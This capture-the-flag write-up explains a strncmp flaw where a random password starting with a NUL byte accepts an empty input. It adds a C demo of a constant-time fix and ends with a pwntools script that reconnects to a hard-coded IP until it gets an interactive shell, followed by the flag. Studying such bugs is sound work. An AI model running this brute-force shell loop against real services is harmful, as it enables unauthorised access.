Tags: string-format

Rating: 0

This seems to be a very simple challenge. I'm not sure why this was classified as medium.

The authenticate function looked like:


get_inp(&s1, 1024);                 /* read up to 1024 bytes of user input into s1 */
if ( !strncmp(&s1, password, n) )   /* password: n random bytes read from /dev/urandom */
    system("sh");


The password was read from /dev/urandom, so every byte of it is uniformly random and there is a 1/256 chance that the first byte is NUL (0x00). strncmp treats both arguments as C strings and stops at the first NUL in either one, so when password[0] is 0x00 an empty input compares equal and the check passes. Simply sending an empty password on each connection gets you a shell; with 1000 attempts the chance of hitting a NUL-first password at least once is 1 - (255/256)^1000, roughly 98%.
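To make the strncmp behaviour concrete, here is an added C example (not code from the challenge binary or from this writeup): it puts the decompiled check next to a fixed-length, constant-time comparison that is not fooled by an embedded NUL, counts how often the empty string passes against random passwords, and computes the success probability of a 1000-attempt loop. The function names, the 16-byte password length and the xorshift PRNG (standing in for /dev/urandom so the run is reproducible) are assumptions for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Vulnerable check, mirroring the challenge's decompiled authenticate():
 * strncmp() treats both arguments as C strings and stops at the first NUL
 * byte in either one, so a password whose first byte is 0x00 is matched
 * by the empty string. Returns 1 when the caller would spawn the shell. */
int check_vuln(const char *input, const char *password, size_t n)
{
    return strncmp(input, password, n) == 0;
}

/* Hardened check (assumed fix, not the challenge's code): treat the password
 * as n raw bytes rather than a C string. The input must be exactly n bytes
 * long and every byte is compared with no early exit, so an embedded NUL
 * cannot truncate the comparison and the running time does not reveal how
 * many leading bytes matched. */
int check_fixed(const unsigned char *input, size_t input_len,
                const unsigned char *password, size_t n)
{
    if (input_len != n)
        return 0;
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= input[i] ^ password[i];
    return diff == 0;
}

/* xorshift32: small deterministic PRNG standing in for /dev/urandom so the
 * simulation below is reproducible. Not for cryptographic use. */
static uint32_t xorshift32(uint32_t *state)
{
    uint32_t x = *state;
    x ^= x << 13;
    x ^= x >> 17;
    x ^= x << 5;
    return *state = x;
}

/* Generate `trials` random n-byte passwords and count how many of them the
 * empty string passes against check_vuln(). Expected hits: about trials/256. */
unsigned long empty_string_hits(unsigned long trials, size_t n, uint32_t seed)
{
    uint32_t state = seed ? seed : 1;   /* xorshift must not start at 0 */
    unsigned long hits = 0;
    char *pw = malloc(n);
    if (!pw)
        return 0;
    for (unsigned long t = 0; t < trials; t++) {
        for (size_t i = 0; i < n; i++)
            pw[i] = (char)(xorshift32(&state) & 0xff);
        hits += check_vuln("", pw, n);
    }
    free(pw);
    return hits;
}

/* Chance that at least one of k independent attempts succeeds when each
 * succeeds with probability 1/256: 1 - (255/256)^k. k = 1000 gives ~0.98. */
double success_after(unsigned long k)
{
    double miss = 1.0;
    for (unsigned long i = 0; i < k; i++)
        miss *= 255.0 / 256.0;
    return 1.0 - miss;
}

int main(void)
{
    char pw_nul[16] = { 0 };                /* first byte 0x00: "" is the effective password */
    char pw_ok[16]  = "correct horse!!";    /* 15 printable bytes + terminating NUL */

    printf("vuln,  empty input vs NUL-first password: %d\n", check_vuln("", pw_nul, 16));
    printf("vuln,  empty input vs normal password:    %d\n", check_vuln("", pw_ok, 16));
    printf("fixed, empty input vs NUL-first password: %d\n",
           check_fixed((const unsigned char *)"", 0, (const unsigned char *)pw_nul, 16));
    printf("empty-string hits in 256000 random passwords: %lu (expect ~1000)\n",
           empty_string_hits(256000, 16, 0x1337u));
    printf("P(success within 1000 attempts) = %.3f\n", success_after(1000));
    return 0;
}
```

The fixed version also closes the smaller leak in the original: strncmp returns at the first differing byte, so its timing depends on how long a prefix of the password the attacker has guessed correctly. Comparing all n bytes with an OR-accumulated XOR removes that dependency.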


from pwn import *
context.log_level = 'error'
for i in range(1000):
    conn = remote("18.224.57.15", 1337)
    conn.recvuntil(b">>> ")
    conn.sendline(b"1")            # menu option 1: authenticate
    conn.sendline(b"")             # empty password: matches when password[0] == 0x00
    conn.sendline(b"echo pwned")   # probe (assumed): only a spawned shell echoes this back
    if b"pwned" in conn.recvrepeat(1):
        conn.interactive()
        break
    conn.close()

Flag: inctf{sp1r1t3d_n0te_t0_uns3cur3_the_p4d}